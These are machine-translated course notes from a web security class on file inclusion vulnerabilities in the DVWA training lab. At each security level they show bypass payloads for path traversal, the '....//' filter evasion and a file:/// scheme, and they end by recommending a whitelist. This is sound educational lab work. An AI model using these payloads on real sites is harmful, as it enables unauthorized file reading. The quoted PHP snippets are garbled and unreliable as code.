"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat-5. File contains

file Inclusion: refers to the page to use the URL to the dynamic inclusion of files (include or require, etc.), when the file name parameters controllable but also filter is not strict, it is easy to use. The file contains a vulnerability that is classified as a local file containing a vulnerability and a remote file contains a vulnerability because a remote file contains a vulnerability because the Allow_url_fopen option in the PHP configuration is turned on (after the option is enabled, the server allows a remote file to be included).

DVWA Combat:

1. Open Phpstudy or XAMPP, run Apach and MySQL, here to specifically open the PHP allow_url_include option: Click on the Panel "Other options Menu"->php expansion and settings, parameter switch settings--tick " Allow_url_include ";

2. The browser enters Dvwa main interface, in the left column Select Dvwa security level is low, then enter the file inclusion;

We see three file options on the page, and when we click on one, the page displays the contents of the file, and we see that the URL becomes:

http://localhost/DVWA-1.9/vulnerabilities/fi/?page=file1.php

3. If we change the page parameters, will we be able to get other files? We tried to change the parameter to page=. /.. /phpinfo.php, as a result, we got the information on this page smoothly:

In this way, we took advantage of the vulnerabilities contained in the file to obtain a page that should not have been presented to us. If we look at the background source, we will find that one sentence:

$file $_get [' Page '];

Without any filtering, the parameter name can be controlled, resulting in a file containment vulnerability.

4. We set the security level to medium, using the same method, found that the failure. If we look at the background source, found that two more lines of filter control:

// Input Validation $file Str_replace Array $file  ); $file Str_replace Array $file );

Will be "http://", "https://", ". /”、”.. \ "Filter out, replace becomes null character. This reminds us of the way the key commands are filtered in the command injection section, so it inspires us to construct ....//, filter out one of them, and the rest is just right, for example, to modify page=....//....// phpinfo.php, the same results were obtained.

5. Next we try high grade file contains, found using the above method, error: Error:file not found!, view the background source, found that using the Fnmatch function to check the page parameters, the page parameter must start with file.

if $file $file ! = "include.php" )    {// This isn ' t the page we want!    Echo "Error:file not found!";

That being the case, we just have to let the argument start with file, and construct the following URL parameter:

page=file:///e:/development/kplayer/web/php/phpstudy/www/dvwa-1.9/phpinfo.php

You can also get the previous page.

6. Finally we look at the impossible security level, found that the previous methods are not working, to view the background source code, found that the original use of the white list mechanism, page parameters must be "include.php", "file1.php", "file2.php", " File3.php "one that eliminates file containment vulnerabilities.

// Only allow include.php or file{1..3}.php if $file $file $file $file ! = "file3.php" )    {// This isn ' t the page we want!    Echo "Error:file not found!";

Practical experience:

When the server turns on the allow_url_include option, the URL is used to dynamically include the file via some of the PHP's feature functions (include (), require (), and include_once (), require_once ()). At this point, if the file source is not strictly reviewed, it will result in arbitrary file reads or arbitrary command execution. Therefore, the effective way is to use the white list to prevent the vulnerability.

"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat-5. File contains